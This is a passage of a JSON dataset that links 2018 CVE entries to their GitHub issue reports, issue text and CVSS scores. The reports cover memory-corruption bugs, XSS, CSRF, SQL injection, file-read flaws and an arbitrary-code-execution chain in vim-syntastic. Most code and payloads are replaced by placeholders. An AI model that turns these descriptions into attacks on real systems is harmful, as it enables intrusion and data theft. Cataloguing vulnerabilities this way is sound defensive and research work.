  19223. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  19224. "severity": "HIGH",
  19225. "baseScore": 7.2,
  19226. "impactScore": 5.9,
  19227. "exploitabilityScore": 1.2
  19228. },
  19229. {
  19230. "CVE_ID": "CVE-2018-11210",
  19231. "Issue_Url_old": "https://github.com/leethomason/tinyxml2/issues/675",
  19232. "Issue_Url_new": "https://github.com/leethomason/tinyxml2/issues/675",
  19233. "Repo_new": "leethomason/tinyxml2",
  19234. "Issue_Created_At": "2018-05-16T02:05:16Z",
  19235. "description": "Heap buffer overflow error in APITAG hello\uff01I used libFuzzer to test APITAG and hit a heap buffer overflow error. I think it is due to APITAG APITAG function APITAG leading to the heap buffer overflow.",
  19236. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19237. "severity": "CRITICAL",
  19238. "baseScore": 9.8,
  19239. "impactScore": 5.9,
  19240. "exploitabilityScore": 3.9
  19241. },
  19242. {
  19243. "CVE_ID": "CVE-2018-11218",
  19244. "Issue_Url_old": "https://github.com/antirez/redis/issues/5017",
  19245. "Issue_Url_new": "https://github.com/redis/redis/issues/5017",
  19246. "Repo_new": "redis/redis",
  19247. "Issue_Created_At": "2018-06-13T10:50:36Z",
  19248. "description": "Placeholder.",
  19249. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19250. "severity": "CRITICAL",
  19251. "baseScore": 9.8,
  19252. "impactScore": 5.9,
  19253. "exploitabilityScore": 3.9
  19254. },
  19255. {
  19256. "CVE_ID": "CVE-2018-11225",
  19257. "Issue_Url_old": "https://github.com/libming/libming/issues/143",
  19258. "Issue_Url_new": "https://github.com/libming/libming/issues/143",
  19259. "Repo_new": "libming/libming",
  19260. "Issue_Created_At": "2018-05-16T21:17:43Z",
  19261. "description": "SEGV in dcputs in APITAG URLTAG URLTAG Program received signal SIGSEGV, Segmentation fault. strlen () at PATHTAG NUMBERTAG PATHTAG No such file or directory. (gdb) bt NUMBERTAG strlen () at PATHTAG NUMBERTAG cca4 in dcputs (s NUMBERTAG at APITAG NUMBERTAG bf in APITAG (n=<optimized out>, actions NUMBERTAG a NUMBERTAG maxn=<optimized out>) at APITAG NUMBERTAG in APITAG (indent NUMBERTAG actions NUMBERTAG a NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG c4f0, maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG c4f0, n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d6d in APITAG (indent=<optimized out>, actions=<optimized out>, n NUMBERTAG at APITAG NUMBERTAG decompile_SWITCH (n NUMBERTAG off1end=<optimized out>, maxn=<optimized out>, actions NUMBERTAG c NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>) at APITAG NUMBERTAG a NUMBERTAG in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n=<optimized out>, actions=<optimized out>, maxn=<optimized out>, is_type2=<optimized out>) at APITAG NUMBERTAG d in APITAG (indent=<optimized out>, actions NUMBERTAG n NUMBERTAG at APITAG NUMBERTAG APITAG (n NUMBERTAG actions NUMBERTAG indent=indent APITAG at APITAG NUMBERTAG f NUMBERTAG a in APITAG (pblock NUMBERTAG at APITAG NUMBERTAG e in APITAG (f NUMBERTAG at APITAG NUMBERTAG main (argc=<optimized out>, argv=<optimized out>) at APITAG Breakpoint NUMBERTAG dcputs (s NUMBERTAG APITAG { \") at APITAG NUMBERTAG int len=strlen(s); (gdb) l NUMBERTAG oid NUMBERTAG dcputs(const char s NUMBERTAG int len=strlen(s NUMBERTAG dcchkstr(len NUMBERTAG strcat(dcptr,s NUMBERTAG dcptr+=len NUMBERTAG strsize+=len;",
  19262. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19263. "severity": "HIGH",
  19264. "baseScore": 8.8,
  19265. "impactScore": 5.9,
  19266. "exploitabilityScore": 2.8
  19267. },
  19268. {
  19269. "CVE_ID": "CVE-2018-11230",
  19270. "Issue_Url_old": "https://github.com/agl/jbig2enc/issues/61",
  19271. "Issue_Url_new": "https://github.com/agl/jbig2enc/issues/61",
  19272. "Repo_new": "agl/jbig2enc",
  19273. "Issue_Created_At": "2018-05-17T06:49:15Z",
  19274. "description": "Error: heap use after free APITAG jbig2_add_page(jbig2ctx , Pix ). Hello, I used my company's tools and found a crash in jbig: it is a heap use after free APITAG jbig2_add_page(jbig2ctx , Pix ). I think it is due to APITAG when APITAG wants to obtain the width of the photo.",
  19275. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19276. "severity": "HIGH",
  19277. "baseScore": 8.8,
  19278. "impactScore": 5.9,
  19279. "exploitabilityScore": 2.8
  19280. },
  19281. {
  19282. "CVE_ID": "CVE-2018-11243",
  19283. "Issue_Url_old": "https://github.com/upx/upx/issues/207",
  19284. "Issue_Url_new": "https://github.com/upx/upx/issues/207",
  19285. "Repo_new": "upx/upx",
  19286. "Issue_Created_At": "2018-05-18T06:06:08Z",
  19287. "description": "free of invalid pointer in APITAG ./upx.out version up NUMBERTAG git d NUMBERTAG ec NUMBERTAG this is a bug in decompression (upx d or upx t), which is more significant than bugs in compression. It crashes when trying to free an invalid pointer; mem.cpp detects the invalid double free and throws an exception (SIGABRT) FILETAG NUMBERTAG dacce in APITAG (this NUMBERTAG fffffffd NUMBERTAG at APITAG NUMBERTAG APITAG (this NUMBERTAG fffffffd NUMBERTAG at APITAG NUMBERTAG APITAG (this NUMBERTAG fffffffd NUMBERTAG in_chrg=<optimized out>) at APITAG NUMBERTAG bc in APITAG (this=<optimized out>, fo=<optimized out>) at APITAG If an attacker could place a fake chunk at that pointer, it would be a double-free vulnerability and the attacker might be able to achieve code execution.",
  19288. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19289. "severity": "HIGH",
  19290. "baseScore": 7.8,
  19291. "impactScore": 5.9,
  19292. "exploitabilityScore": 1.8
  19293. },
  19294. {
  19295. "CVE_ID": "CVE-2018-11243",
  19296. "Issue_Url_old": "https://github.com/upx/upx/issues/206",
  19297. "Issue_Url_new": "https://github.com/upx/upx/issues/206",
  19298. "Repo_new": "upx/upx",
  19299. "Issue_Created_At": "2018-05-17T18:06:14Z",
  19300. "description": "multiple memory reading issue. ./upx.out version up NUMBERTAG git NUMBERTAG c NUMBERTAG fb7d7b+ this time is the devel branch , everything up to date FILETAG the call stack for POC NUMBERTAG f8 in get_le NUMBERTAG p NUMBERTAG at APITAG NUMBERTAG APITAG (this NUMBERTAG b NUMBERTAG c0 APITAG , p NUMBERTAG at APITAG the FILETAG , contains POC1 & POC2 FILETAG",
  19301. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19302. "severity": "HIGH",
  19303. "baseScore": 7.8,
  19304. "impactScore": 5.9,
  19305. "exploitabilityScore": 1.8
  19306. },
  19307. {
  19308. "CVE_ID": "CVE-2018-11248",
  19309. "Issue_Url_old": "https://github.com/lingochamp/FileDownloader/issues/1028",
  19310. "Issue_Url_new": "https://github.com/lingochamp/filedownloader/issues/1028",
  19311. "Repo_new": "lingochamp/filedownloader",
  19312. "Issue_Created_At": "2018-05-17T11:01:52Z",
  19313. "description": "Directory Traversal Vulnerability in APITAG We have found a directory traversal vulnerability in APITAG which may cause remote code execution. For consideration of security, we do not reveal the detail of this vulnerability currently. Developers of this repo can contact me by Email: tiamo_inter foxmail.com",
  19314. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19315. "severity": "CRITICAL",
  19316. "baseScore": 9.8,
  19317. "impactScore": 5.9,
  19318. "exploitabilityScore": 3.9
  19319. },
  19320. {
  19321. "CVE_ID": "CVE-2018-11251",
  19322. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/956",
  19323. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/956",
  19324. "Repo_new": "imagemagick/imagemagick",
  19325. "Issue_Created_At": "2018-01-24T02:10:17Z",
  19326. "description": "heap buffer overflow in APITAG INFO Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Copyright NUMBERTAG APITAG Studio LLC License: FILETAG Features: Cipher DPC HDRI Delegates (built in): bzlib djvu fftw fontconfig freetype gvc jbig jng jpeg lcms lqr lzma pangocairo png tiff webp wmf x xml zlib Trigger Command: magick buffer overflow APITAG /dev/null ASAN OUTPUT ERRORTAG testcase: URLTAG",
  19327. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19328. "severity": "MEDIUM",
  19329. "baseScore": 6.5,
  19330. "impactScore": 3.6,
  19331. "exploitabilityScore": 2.8
  19332. },
  19333. {
  19334. "CVE_ID": "CVE-2018-11319",
  19335. "Issue_Url_old": "https://github.com/vim-syntastic/syntastic/issues/2170",
  19336. "Issue_Url_new": "https://github.com/vim-syntastic/syntastic/issues/2170",
  19337. "Repo_new": "vim-syntastic/syntastic",
  19338. "Issue_Created_At": "2018-04-16T17:25:45Z",
  19339. "description": "Checker config files allow arbitrary code execution scenarios. Hi, I'm the Debian maintainer of vim syntastic and I received this bug report: CVETAG Package: vim syntastic Version NUMBERTAG Severity: serious Hello, syntastic has a Configuration Files NUMBERTAG feature enabled for several checkers, where: a configuration file is looked up in the directory of the file being checked, then upwards in parent directories. The search stops either when a file with the right name is found, or when the root of the filesystem is reached NUMBERTAG URLTAG Each line found in the configuration file is escaped as a single argument and appended to the checker command being run. I am not an expert on the various possibly dangerous command line options of all possible checkers, but I played with one I knew how to play with, and what follows is a possible attack. There might be easier attacks on checkers that are enabled by default, since the configuration files features, as it is now, leaves a pretty wide attack surface open. Step NUMBERTAG a malicious gcc plugin The source code: CODETAG Building the plugin: APITAG Installing the plugin as APITAG in /tmp: APITAG Step NUMBERTAG a syntastic config file APITAG Step NUMBERTAG enable the avrgcc plugin APITAG Step NUMBERTAG edit a C++ file in /tmp APITAG Step NUMBERTAG cry APITAG What should be different There are several steps that can avoid this NUMBERTAG allow to disable this feature, and ship with this feature disabled by default NUMBERTAG stop recursing upwards when hitting a directory that's writable by someone other than the current user NUMBERTAG check that the config files are owned by the current user Mitigation I am not a vimscript expert, and unfortunately I have not found a way to disable this behaviour without editing the syntastic config files. It works. What do you think about it?",
  19340. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  19341. "severity": "HIGH",
  19342. "baseScore": 7.5,
  19343. "impactScore": 5.9,
  19344. "exploitabilityScore": 1.6
  19345. },
  19346. {
  19347. "CVE_ID": "CVE-2018-11320",
  19348. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/4578",
  19349. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/4578",
  19350. "Repo_new": "octopusdeploy/issues",
  19351. "Issue_Created_At": "2018-05-21T05:32:37Z",
  19352. "description": "Sensitive variables contributed via machine during deployment are not obfuscated in the deployment logs. When an Azure Target is involved in a deployment, the sensitive account variables linked to it are not obfuscated in the logs. Steps to reproduce Create an Azure Subscription account Create an Azure APITAG target that uses the previously created account Create a project with a Deploy Azure APITAG step that uses the same role as the previously created target. Add the debugging variable APITAG to the project. Create and deploy release View the deployment log What you expect to see The printed log should show APITAG as the value of the variable APITAG What you see instead The actual value of the azure password is printed to the logs Octopus releases with this regression bug This issue came about with a changed execution pipeline which was available from APITAG however this code path that led to this bug would not have been commonly executed until the Azure targets introduced in APITAG CVE NUMBERTAG",
  19353. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  19354. "severity": "CRITICAL",
  19355. "baseScore": 9.8,
  19356. "impactScore": 5.9,
  19357. "exploitabilityScore": 3.9
  19358. },
  19359. {
  19360. "CVE_ID": "CVE-2018-11330",
  19361. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/58",
  19362. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/58",
  19363. "Repo_new": "pluck-cms/pluck",
  19364. "Issue_Created_At": "2018-05-19T01:50:38Z",
  19365. "description": "Xss & file upload vuln. Please advise. .",
  19366. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  19367. "severity": "MEDIUM",
  19368. "baseScore": 4.8,
  19369. "impactScore": 2.7,
  19370. "exploitabilityScore": 1.7
  19371. },
  19372. {
  19373. "CVE_ID": "CVE-2018-11332",
  19374. "Issue_Url_old": "https://github.com/ClipperCMS/ClipperCMS/issues/483",
  19375. "Issue_Url_new": "https://github.com/clippercms/clippercms/issues/483",
  19376. "Repo_new": "clippercms/clippercms",
  19377. "Issue_Created_At": "2018-05-22T12:33:20Z",
  19378. "description": "Persistent XSS on APITAG name' field (site_name). A persistent (stored) XSS can be exploited because site_name isn't being sanitized upon saving. This vulnerability is specifically the APITAG Name\" field under the Configuration APITAG tab. Here's an output when the payload APITAG alert NUMBERTAG APITAG is entered and saved. Upon saving through the field: FILETAG Upon visiting the login page: FILETAG Please refer here for a fix: URLTAG",
  19379. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  19380. "severity": "MEDIUM",
  19381. "baseScore": 4.8,
  19382. "impactScore": 2.7,
  19383. "exploitabilityScore": 1.7
  19384. },
  19385. {
  19386. "CVE_ID": "CVE-2018-11339",
  19387. "Issue_Url_old": "https://github.com/frappe/frappe/issues/5546",
  19388. "Issue_Url_new": "https://github.com/frappe/frappe/issues/5546",
  19389. "Repo_new": "frappe/frappe",
  19390. "Issue_Created_At": "2018-05-10T15:30:41Z",
  19391. "description": "XSS Vulnerability in comment area. URLTAG",
  19392. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  19393. "severity": "MEDIUM",
  19394. "baseScore": 6.1,
  19395. "impactScore": 2.7,
  19396. "exploitabilityScore": 2.8
  19397. },
  19398. {
  19399. "CVE_ID": "CVE-2018-11371",
  19400. "Issue_Url_old": "https://github.com/zorlan/skycaiji/issues/9",
  19401. "Issue_Url_new": "https://github.com/zorlan/skycaiji/issues/9",
  19402. "Repo_new": "zorlan/skycaiji",
  19403. "Issue_Created_At": "2018-05-22T10:13:44Z",
  19404. "description": "\u540e\u53f0\u6dfb\u52a0\u7528\u6237CSRF\u6f0f\u6d1e. \u63cf\u8ff0\uff1a APITAG \u6f0f\u6d1e\u7c7b\u578b\uff1a CSRF \u653b\u51fb\u8f7d\u4f53\uff1a FILETAG CODETAG APITAG \u653b\u51fb\u5f71\u54cd\uff1a \u653b\u51fb\u8005\u8bbf\u95ee\u6b64\u9875\u9762\u5373\u53ef\u6dfb\u52a0\u7f51\u7ad9\u7ba1\u7406\u5458\u8d26\u53f7",
  19405. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19406. "severity": "HIGH",
  19407. "baseScore": 8.8,
  19408. "impactScore": 5.9,
  19409. "exploitabilityScore": 2.8
  19410. },
  19411. {
  19412. "CVE_ID": "CVE-2018-11375",
  19413. "Issue_Url_old": "https://github.com/radare/radare2/issues/9928",
  19414. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9928",
  19415. "Repo_new": "radareorg/radare2",
  19416. "Issue_Created_At": "2018-04-19T12:52:01Z",
  19417. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Generic (binary file) | Architecture/bits of the file (mandatory) | AVR | r2 v full output, not truncated (mandatory) |radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG dfca commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19418. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19419. "severity": "MEDIUM",
  19420. "baseScore": 5.5,
  19421. "impactScore": 3.6,
  19422. "exploitabilityScore": 1.8
  19423. },
  19424. {
  19425. "CVE_ID": "CVE-2018-11376",
  19426. "Issue_Url_old": "https://github.com/radare/radare2/issues/9904",
  19427. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9904",
  19428. "Repo_new": "radareorg/radare2",
  19429. "Issue_Created_At": "2018-04-16T19:06:05Z",
  19430. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g8f NUMBERTAG fa commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run `r2 A r2_hoobr_r_read_le NUMBERTAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19431. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19432. "severity": "MEDIUM",
  19433. "baseScore": 5.5,
  19434. "impactScore": 3.6,
  19435. "exploitabilityScore": 1.8
  19436. },
  19437. {
  19438. "CVE_ID": "CVE-2018-11377",
  19439. "Issue_Url_old": "https://github.com/radare/radare2/issues/9901",
  19440. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9901",
  19441. "Repo_new": "radareorg/radare2",
  19442. "Issue_Created_At": "2018-04-16T12:30:04Z",
  19443. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Generic | Architecture/bits of the file (mandatory) | AVR | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g8f NUMBERTAG fa commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19444. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19445. "severity": "MEDIUM",
  19446. "baseScore": 5.5,
  19447. "impactScore": 3.6,
  19448. "exploitabilityScore": 1.8
  19449. },
  19450. {
  19451. "CVE_ID": "CVE-2018-11378",
  19452. "Issue_Url_old": "https://github.com/radare/radare2/issues/9969",
  19453. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9969",
  19454. "Repo_new": "radareorg/radare2",
  19455. "Issue_Created_At": "2018-04-27T11:06:14Z",
  19456. "description": "Stack buffer overflow in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Binary (generic) | Architecture/bits of the file (mandatory) | WASM | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f commit: APITAG build NUMBERTAG Expected behavior Dissasembly of file or error message. Actual behavior Stack buffer overflow in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19457. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  19458. "severity": "HIGH",
  19459. "baseScore": 7.8,
  19460. "impactScore": 5.9,
  19461. "exploitabilityScore": 1.8
  19462. },
  19463. {
  19464. "CVE_ID": "CVE-2018-11379",
  19465. "Issue_Url_old": "https://github.com/radare/radare2/issues/9926",
  19466. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9926",
  19467. "Repo_new": "radareorg/radare2",
  19468. "Issue_Created_At": "2018-04-19T08:52:37Z",
  19469. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | PE | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) |radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG dfca commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19470. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19471. "severity": "MEDIUM",
  19472. "baseScore": 5.5,
  19473. "impactScore": 3.6,
  19474. "exploitabilityScore": 1.8
  19475. },
  19476. {
  19477. "CVE_ID": "CVE-2018-11380",
  19478. "Issue_Url_old": "https://github.com/radare/radare2/issues/9970",
  19479. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9970",
  19480. "Repo_new": "radareorg/radare2",
  19481. "Issue_Created_At": "2018-04-27T11:08:26Z",
  19482. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Mach O | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG f commit: APITAG build NUMBERTAG Expected behavior Dissasembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19483. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19484. "severity": "MEDIUM",
  19485. "baseScore": 5.5,
  19486. "impactScore": 3.6,
  19487. "exploitabilityScore": 1.8
  19488. },
  19489. {
  19490. "CVE_ID": "CVE-2018-11381",
  19491. "Issue_Url_old": "https://github.com/radare/radare2/issues/9902",
  19492. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9902",
  19493. "Repo_new": "radareorg/radare2",
  19494. "Issue_Created_At": "2018-04-16T12:33:32Z",
  19495. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Generic | Architecture/bits of the file (mandatory) | None APITAG file) | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g8f NUMBERTAG fa commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19496. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19497. "severity": "MEDIUM",
  19498. "baseScore": 5.5,
  19499. "impactScore": 3.6,
  19500. "exploitabilityScore": 1.8
  19501. },
  19502. {
  19503. "CVE_ID": "CVE-2018-11382",
  19504. "Issue_Url_old": "https://github.com/radare/radare2/issues/10091",
  19505. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/10091",
  19506. "Repo_new": "radareorg/radare2",
  19507. "Issue_Created_At": "2018-05-14T12:44:21Z",
  19508. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | Binary | Architecture/bits of the file (mandatory) | AVR | r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g NUMBERTAG d2b NUMBERTAG commit: APITAG build NUMBERTAG Expected behavior Disassembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run: APITAG Additional Logs, screenshots, source code, configuration dump, ... ERRORTAG",
  19509. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19510. "severity": "MEDIUM",
  19511. "baseScore": 5.5,
  19512. "impactScore": 3.6,
  19513. "exploitabilityScore": 1.8
  19514. },
  19515. {
  19516. "CVE_ID": "CVE-2018-11383",
  19517. "Issue_Url_old": "https://github.com/radare/radare2/issues/9943",
  19518. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9943",
  19519. "Repo_new": "radareorg/radare2",
  19520. "Issue_Created_At": "2018-04-23T10:56:15Z",
  19521. "description": "Invalid free in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g4f NUMBERTAG f9c commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Invaild free and program crash. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... Backtrace & error message: ERRORTAG Extract from Valgrind log: CODETAG",
  19522. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19523. "severity": "MEDIUM",
  19524. "baseScore": 5.5,
  19525. "impactScore": 3.6,
  19526. "exploitabilityScore": 1.8
  19527. },
  19528. {
  19529. "CVE_ID": "CVE-2018-11384",
  19530. "Issue_Url_old": "https://github.com/radare/radare2/issues/9903",
  19531. "Issue_Url_new": "https://github.com/radareorg/radare2/issues/9903",
  19532. "Repo_new": "radareorg/radare2",
  19533. "Issue_Created_At": "2018-04-16T12:39:10Z",
  19534. "description": "Heap out of bounds read in APITAG Work environment | Questions | Answers | | | PATHTAG (mandatory) | Ubuntu NUMBERTAG File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory NUMBERTAG r2 v full output, not truncated (mandatory) | radare NUMBERTAG git NUMBERTAG linu NUMBERTAG APITAG NUMBERTAG g8f NUMBERTAG fa commit: APITAG build NUMBERTAG Expected behavior Display dissaslembly of file or error message. Actual behavior Heap out of bounds read in ASAN build. Steps to reproduce the behavior Download: URLTAG Run APITAG Additional Logs, screenshots, source code, configuration dump, ... ASAN log: ERRORTAG",
  19535. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  19536. "severity": "MEDIUM",
  19537. "baseScore": 5.5,
  19538. "impactScore": 3.6,
  19539. "exploitabilityScore": 1.8
  19540. },
  19541. {
  19542. "CVE_ID": "CVE-2018-11403",
  19543. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/63",
  19544. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/63",
  19545. "Repo_new": "domainmod/domainmod",
  19546. "Issue_Created_At": "2018-05-23T12:35:54Z",
  19547. "description": "There is two cross site scripting vulnerability. Two xss vulnerability was discovered in domainmod NUMBERTAG There are two XSS attacks vulnerability which allows remote attackers to inject arbitrary web script or HTML NUMBERTAG URLTAG NUMBERTAG URLTAG",
  19548. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  19549. "severity": "MEDIUM",
  19550. "baseScore": 5.4,
  19551. "impactScore": 2.7,
  19552. "exploitabilityScore": 2.3
  19553. },
  19554. {
  19555. "CVE_ID": "CVE-2018-11413",
  19556. "Issue_Url_old": "https://github.com/yupoxiong/BearAdmin/issues/5",
  19557. "Issue_Url_new": "https://github.com/yupoxiong/bearadmin/issues/5",
  19558. "Repo_new": "yupoxiong/bearadmin",
  19559. "Issue_Created_At": "2018-05-24T13:00:27Z",
  19560. "description": "There is two vulnerability SQL INJECTION AND AN DOWNLOAD FILES WITHOUT LIMIT. FILETAG INJECTION In the controller file PATHTAG in the function index code line NUMBERTAG CODETAG the parameter named user_id without any APITAG just bring into the MYSQL query. After use the demo account demo demo login in your app, and then using the payload PATHTAG APITAG we can get the version of your MYSQL . that's the testing on your demo website. FILETAG NUMBERTAG download files without any limit in the file PATHTAG In the function __construct ,line NUMBERTAG ERRORTAG from the code we know that the parameter \"name \" is from the GET method.and without any limit let's take a look at the code line NUMBERTAG ERRORTAG $this >back is defined in the file PATHTAG line NUMBERTAG ERRORTAG the dowloadfile function haven't any filters. So i deploy the apps on local,after login we try the poc url PATHTAG FILETAG We can read the config file of mysql account and the password",
  19561. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  19562. "severity": "MEDIUM",
  19563. "baseScore": 6.5,
  19564. "impactScore": 3.6,
  19565. "exploitabilityScore": 2.8
  19566. },
  19567. {
  19568. "CVE_ID": "CVE-2018-11416",
  19569. "Issue_Url_old": "https://github.com/tjko/jpegoptim/issues/57",
  19570. "Issue_Url_new": "https://github.com/tjko/jpegoptim/issues/57",
  19571. "Repo_new": "tjko/jpegoptim",
  19572. "Issue_Created_At": "2018-04-17T01:52:30Z",
